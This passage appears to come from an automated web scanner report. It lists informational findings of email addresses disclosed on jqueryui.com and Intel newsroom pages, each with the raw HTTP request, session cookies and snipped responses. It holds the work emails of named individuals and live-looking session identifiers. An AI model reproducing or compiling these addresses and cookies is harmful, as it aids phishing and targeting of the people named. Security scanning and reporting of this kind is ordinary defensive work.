Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Sat, 05 Feb 2011 23:21:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 15111

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - About jQuery UI - The jQuery UI Team</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,
...[SNIP]...
<a href="mailto:contact@appendto.com">contact@appendTo.com</a>
...[SNIP]...
<a href="mailto:hello@filamentgroup.com">hello@filamentgroup.com</a>
...[SNIP]...

19.18. http://newsroom.intel.com/4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js

Issue detail

The following email address was disclosed in the response:
  • support@zapatec.com

Request

GET /4.0.6/resources/scripts/gen/ae42b539f86ec382d61440d151aa63b2.js HTTP/1.1
Host: newsroom.intel.com
Proxy-Connection: keep-alive
Referer: http://newsroom.intel.com/community/intel_newsroom/?iid=ftr+press
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; cf=0; countrylang=United%20States%20-%20English; intelresearchSTGref=NONE; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_cc=true; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; __utmv=; __utma=1.167981993.1296947562.1296947562.1296947562.1; __utmc=1; __utmb=1.1.10.1296947562; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel; s_lv=1296947567228; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/index.htm; s_sq=intelcorp%2Cintelcorpcim%2Cintelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; jive.recentHistory.-1=31342c323031363b

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:11:11 GMT
Server: Apache
X-JAL: 3
Vary: Accept-Encoding
CacheHit: D=28931 t=1296947471749931
X-JSL: D=28940 t=1296947471749931
Content-Type: text/javascript;charset=UTF-8
Connection: close

/*!
* jQuery JavaScript Library v1.3.2
* http://jquery.com/
*
* Copyright (c) 2009 John Resig
* Dual licensed under the MIT and GPL licenses.
* http://docs.jquery.com/License
*
* Date: 2009-02
...[SNIP]...
<support@zapatec.com>
...[SNIP]...

19.19. http://newsroom.intel.com/community/en_ie  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/en_ie

Issue detail

The following email address was disclosed in the response:
  • sarah.sexton@intel.com

Request

GET /community/en_ie HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:35 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313538363b33382c313936303b33382c313931393b33382c313935393b33382c313934363b33382c313936333b31342c323030353b31342c323032353b31342c323031363b31342c323030343b31342c323031303b; Expires=Mon, 07-Mar-2011 23:14:37 GMT; Path=/
X-JAL: 170
Content-Language: en-US
CacheHit: D=180106 t=1296947675858488
X-JSL: D=180112 t=1296947675858488
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
l.com"
id="jive-32576,107,504,412,324,812"
onmouseover="quickuserprofile.getUserProfileTooltip(3257);"
onmouseout="quickuserprofile.cancelTooltip();"
class="jiveTT-hover-user jive-username-link"
>sarah.sexton@intel.com</a>
...[SNIP]...
<img
class="jive-avatar"

src="/people/sarah.sexton%40intel.com/avatar/22.png?a=1205"
border="0" height="22" width="22"
alt="sarah.sexton@intel.com"
/>
...[SNIP]...
l.com"
id="jive-32576,107,504,413,679,812"
onmouseover="quickuserprofile.getUserProfileTooltip(3257);"
onmouseout="quickuserprofile.cancelTooltip();"
class="jiveTT-hover-user jive-username-link"
>sarah.sexton@intel.com</a>
...[SNIP]...
<img
class="jive-avatar"

src="/people/sarah.sexton%40intel.com/avatar/22.png?a=1205"
border="0" height="22" width="22"
alt="sarah.sexton@intel.com"
/>
...[SNIP]...
l.com"
id="jive-32576,107,504,414,816,812"
onmouseover="quickuserprofile.getUserProfileTooltip(3257);"
onmouseout="quickuserprofile.cancelTooltip();"
class="jiveTT-hover-user jive-username-link"
>sarah.sexton@intel.com</a>
...[SNIP]...
<img
class="jive-avatar"

src="/people/sarah.sexton%40intel.com/avatar/22.png?a=1205"
border="0" height="22" width="22"
alt="sarah.sexton@intel.com"
/>
...[SNIP]...
l.com"
id="jive-32576,107,504,415,749,812"
onmouseover="quickuserprofile.getUserProfileTooltip(3257);"
onmouseout="quickuserprofile.cancelTooltip();"
class="jiveTT-hover-user jive-username-link"
>sarah.sexton@intel.com</a>
...[SNIP]...
<img
class="jive-avatar"

src="/people/sarah.sexton%40intel.com/avatar/22.png?a=1205"
border="0" height="22" width="22"
alt="sarah.sexton@intel.com"
/>
...[SNIP]...
l.com"
id="jive-32576,107,504,416,745,812"
onmouseover="quickuserprofile.getUserProfileTooltip(3257);"
onmouseout="quickuserprofile.cancelTooltip();"
class="jiveTT-hover-user jive-username-link"
>sarah.sexton@intel.com</a>
...[SNIP]...
<img
class="jive-avatar"

src="/people/sarah.sexton%40intel.com/avatar/22.png?a=1205"
border="0" height="22" width="22"
alt="sarah.sexton@intel.com"
/>
...[SNIP]...

19.20. http://newsroom.intel.com/community/en_za/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/en_za/

Issue detail

The following email address was disclosed in the response:
  • ntombezinhle.modiselle@intel.com

Request

GET /community/en_za/ HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:37 GMT
Server: Apache
Set-Cookie: jive.recentHistory.-1=332c333031313b332c323137393b332c323137373b33382c313936303b33382c313931393b33382c313538363b33382c313935393b33382c313934363b33382c313936333b31342c323031313b31342c323031363b31342c323030373b31342c323031303b31342c323032353b31342c323030343b31342c323030353b; Expires=Mon, 07-Mar-2011 23:14:38 GMT; Path=/
X-JAL: 151
Content-Language: en-US
CacheHit: D=159108 t=1296947677046883
X-JSL: D=159113 t=1296947677046883
Cache-Control: no-cache
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<he
...[SNIP]...
<a class="jive-link-email-small" href="mailto:ntombezinhle.modiselle@intel.com">
...[SNIP]...

19.21. http://newsroom.intel.com/community/feeds/allcontent  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/feeds/allcontent

Issue detail

The following email addresses were disclosed in the response:
  • digita@ibi.tu-berlin.de
  • intel_bildung@flutlicht.biz
  • ireland.esc.hire@intel.com
  • webadmin@intel.com

Request

GET /community/feeds/allcontent HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:17 GMT
Server: Apache
Last-Modified: Sat, 05 Feb 2011 18:20:50 GMT
ETag: "1296930050887"
X-JAL: 20
Content-Language: en-US
CacheHit: D=24681 t=1296947657604353
X-JSL: D=24686 t=1296947657604353
Cache-Control: no-cache
Content-Type: text/xml;charset=UTF-8
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:clearspace="http://www.jivesoftware.com/xmlns/clearspace/rss" xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0">
<channel>
<title>Int
...[SNIP]...
-link-external-small" href="http://www.intel.com/jobs/Ireland"&gt;www.intel.com/jobs/Ireland&lt;/a&gt; to find out more and apply, or email your cv to: &lt;a class="jive-link-email-small" href="mailto:ireland.esc.hire@intel.com"&gt;ireland.esc.hire@intel.com&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;!-- [DocumentBodyEnd:89aa55a4-2241-4dea-b3ca-187740dbffe6] --&gt;</description>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
iv id="_mcePaste"&gt;Christine Koll&amp;eacute;ra &amp;amp; Marie-Kristin Mehlitz&lt;/div&gt;&lt;div id="_mcePaste"&gt;&lt;span&gt;E-Mail: &lt;/span&gt;&lt;a class="jive-link-email-small" href="mailto:intel_bildung@flutlicht.biz"&gt;intel_bildung@flutlicht.biz&lt;/a&gt;&lt;span&gt; &lt;/span&gt;&lt;/div&gt;&lt;div id="_mcePaste"&gt;Telefon: +49 (0) 911 / 474950&lt;/div&gt;&lt;br&gt;&lt;br&gt;&lt;div&gt;Dar&amp;#252;ber hinaus laden wir Sie herzlich ein zur
...[SNIP]...
rum Bildung der didacta auf dem Gel&amp;auml;nde der Messe Stuttgart in &lt;strong&gt;Halle 1, Stand 1K72&lt;/strong&gt;. Wir bitten Sie, sich unter &lt;a class="jive-link-external-small" href="mailto:digita@ibi.tu-berlin.de"&gt;digita@ibi.tu-berlin.de&lt;/a&gt; f&amp;#252;r die Preisverleihung anzumelden; bitte geben Sie an, ob Sie Eintrittskarten f&amp;#252;r die didacta ben&amp;#246;tigen. &amp;Uuml;berreicht werden die Auszeichnungen durch die d
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...

19.22. http://newsroom.intel.com/community/feeds/blogs  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/feeds/blogs

Issue detail

The following email addresses were disclosed in the response:
  • ireland.esc.hire@intel.com
  • webadmin@intel.com

Request

GET /community/feeds/blogs HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:19 GMT
Server: Apache
Last-Modified: Sat, 05 Feb 2011 18:29:31 GMT
ETag: "1296930571238"
X-JAL: 31
Content-Language: en-US
CacheHit: D=50554 t=1296947659409974
X-JSL: D=50560 t=1296947659409974
Cache-Control: no-cache
Content-Type: text/xml;charset=UTF-8
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:clearspace="http://www.jivesoftware.com/xmlns/clearspace/rss" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/
...[SNIP]...
-link-external-small" href="http://www.intel.com/jobs/Ireland"&gt;www.intel.com/jobs/Ireland&lt;/a&gt; to find out more and apply, or email your cv to: &lt;a class="jive-link-email-small" href="mailto:ireland.esc.hire@intel.com"&gt;ireland.esc.hire@intel.com&lt;/a&gt;.&lt;/div&gt;&lt;/div&gt;&lt;!-- [DocumentBodyEnd:89aa55a4-2241-4dea-b3ca-187740dbffe6] --&gt;</description>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...

19.23. http://newsroom.intel.com/community/feeds/documents  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/feeds/documents

Issue detail

The following email addresses were disclosed in the response:
  • digita@ibi.tu-berlin.de
  • intel_bildung@flutlicht.biz
  • webadmin@intel.com

Request

GET /community/feeds/documents HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=174403261; cf=0; __utmb=174403261.3.10.1296947569;

Response

HTTP/1.1 200 OK
Date: Sat, 05 Feb 2011 23:14:21 GMT
Server: Apache
Last-Modified: Thu, 03 Feb 2011 14:17:51 GMT
ETag: "1296742671571"
X-JAL: 21
Content-Language: en-US
CacheHit: D=25875 t=1296947661324041
X-JSL: D=25880 t=1296947661324041
Cache-Control: no-cache
Content-Type: text/xml;charset=UTF-8
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:clearspace="http://www.jivesoftware.com/xmlns/clearspace/rss" xmlns:dc="http://purl.org/dc/elements/1.1/" version="2.0">
<channel>
<title>Int
...[SNIP]...
iv id="_mcePaste"&gt;Christine Koll&amp;eacute;ra &amp;amp; Marie-Kristin Mehlitz&lt;/div&gt;&lt;div id="_mcePaste"&gt;&lt;span&gt;E-Mail: &lt;/span&gt;&lt;a class="jive-link-email-small" href="mailto:intel_bildung@flutlicht.biz"&gt;intel_bildung@flutlicht.biz&lt;/a&gt;&lt;span&gt; &lt;/span&gt;&lt;/div&gt;&lt;div id="_mcePaste"&gt;Telefon: +49 (0) 911 / 474950&lt;/div&gt;&lt;br&gt;&lt;br&gt;&lt;div&gt;Dar&amp;#252;ber hinaus laden wir Sie herzlich ein zur
...[SNIP]...
rum Bildung der didacta auf dem Gel&amp;auml;nde der Messe Stuttgart in &lt;strong&gt;Halle 1, Stand 1K72&lt;/strong&gt;. Wir bitten Sie, sich unter &lt;a class="jive-link-external-small" href="mailto:digita@ibi.tu-berlin.de"&gt;digita@ibi.tu-berlin.de&lt;/a&gt; f&amp;#252;r die Preisverleihung anzumelden; bitte geben Sie an, ob Sie Eintrittskarten f&amp;#252;r die didacta ben&amp;#246;tigen. &amp;Uuml;berreicht werden die Auszeichnungen durch die d
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...
<author>webadmin@intel.com</author>
...[SNIP]...

19.24. http://newsroom.intel.com/community/pt_br  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://newsroom.intel.com
Path:   /community/pt_br

Issue detail

The following email addresses were disclosed in the response:
  • alessandra.neris@bm.com
  • raquel.vitorino@bm.com

Request

GET /community/pt_br HTTP/1.1
Host: newsroom.intel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_lv=1296947627821; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; __utmz=174403261.1296947569.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/about/index.htm; countrylang=United%20States%20-%20English; s_sq=intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA%26intelcorpport%3D%2526pid%253Dcim%25253A/about/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; jive.recentHistory.-1=31342c323031363b; jive.server.info="serverName=newsroom.intel.com:serverPort=80:contextPath=:localName=newsroom.intel.com:localPort=80:localAddr=newsroom.intel.com"; s_lv_s=Less%20than%201%20day; gpv_p18=corp%3Anewsroom/community/intel_newsroom/%3Fiid%3Dftr%2Bpress; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=174403261.410478132.1296947569.1296947569.1296947569.1; 